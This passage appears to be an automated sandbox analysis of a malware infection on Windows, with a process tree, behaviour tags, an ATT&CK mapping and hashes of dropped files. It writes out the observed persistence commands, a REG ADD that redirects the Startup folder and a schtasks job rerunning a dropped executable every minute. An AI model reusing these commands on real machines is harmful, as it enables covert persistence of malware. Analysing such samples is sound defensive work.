                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1544,11000603426249382350,8828443669998397139,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4540_739315349" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1560 /prefetch:2
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:8672
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1544,11000603426249382350,8828443669998397139,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4540_739315349" --mojo-platform-channel-handle=3068 /prefetch:8
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                      PID:9604
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1544,11000603426249382350,8828443669998397139,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4540_739315349" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2124 /prefetch:2
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:2872
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1544,11000603426249382350,8828443669998397139,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4540_739315349" --mojo-platform-channel-handle=3352 /prefetch:8
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                          PID:4392
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1544,11000603426249382350,8828443669998397139,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4540_739315349" --mojo-platform-channel-handle=1984 /prefetch:8
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:9360
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1544,11000603426249382350,8828443669998397139,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4540_739315349" --mojo-platform-channel-handle=3360 /prefetch:8
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:1536
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1544,11000603426249382350,8828443669998397139,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4540_739315349" --mojo-platform-channel-handle=3204 /prefetch:8
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:10116
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_B3C8.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                                                            PID:7332
                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                        PID:2408
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                          PID:5220
                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                        PID:8568
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:8876
                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                          PID:8712
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\C527.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\C527.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                          PID:6088
                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:8036
                                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                            PID:5276
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\E11C.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\E11C.exe
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:6860
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:7984
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:6680
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:8960
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe" /F
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                        PID:8112
                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                    PID:9160
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                      PID:8664
                                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                    PID:9088
                                                                                                                                                                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                      DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{3ca7b258-2cda-1b4b-aab1-e6495cceae40}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                      PID:6224
                                                                                                                                                                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                      DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:6140
                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:8524
                                                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                        PID:8876
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\185A.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\185A.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:9192
                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:1208
                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                          PID:7036
                                                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                          PID:1384
                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                          PID:8376
                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                            MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:9116
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                            PID:3940
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            PID:9132
                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                            PID:1324
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            PID:6988
                                                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                            PID:3116
                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                            PID:1364
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            PID:6140
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            PID:4640
                                                                                                                                                                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:9712

                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                            Execution

                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                            Modify Existing Service

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1031

                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1060

                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                            4
                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                            Disabling Security Tools

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1089

                                                                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1497

                                                                                                                                                                                                                                                                            Install Root Certificate

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1130

                                                                                                                                                                                                                                                                            Credential Access

                                                                                                                                                                                                                                                                            Credentials in Files

                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                            T1081

                                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                                            Software Discovery

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1518

                                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                                            7
                                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1497

                                                                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                                                                            7
                                                                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                                                                            Peripheral Device Discovery

                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                            T1120

                                                                                                                                                                                                                                                                            Remote System Discovery

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1018

                                                                                                                                                                                                                                                                            Collection

                                                                                                                                                                                                                                                                            Data from Local System

                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                            T1005

                                                                                                                                                                                                                                                                            Command and Control

                                                                                                                                                                                                                                                                            Web Service

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1102

                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              9499dac59e041d057327078ccada8329

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              9499dac59e041d057327078ccada8329

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CVYT78L54kD253s1R9LEa5ke.exe.log
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Laq5JGnZERJAlgHMV0fMzRiP.exe.log
                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                                                                              SHA1

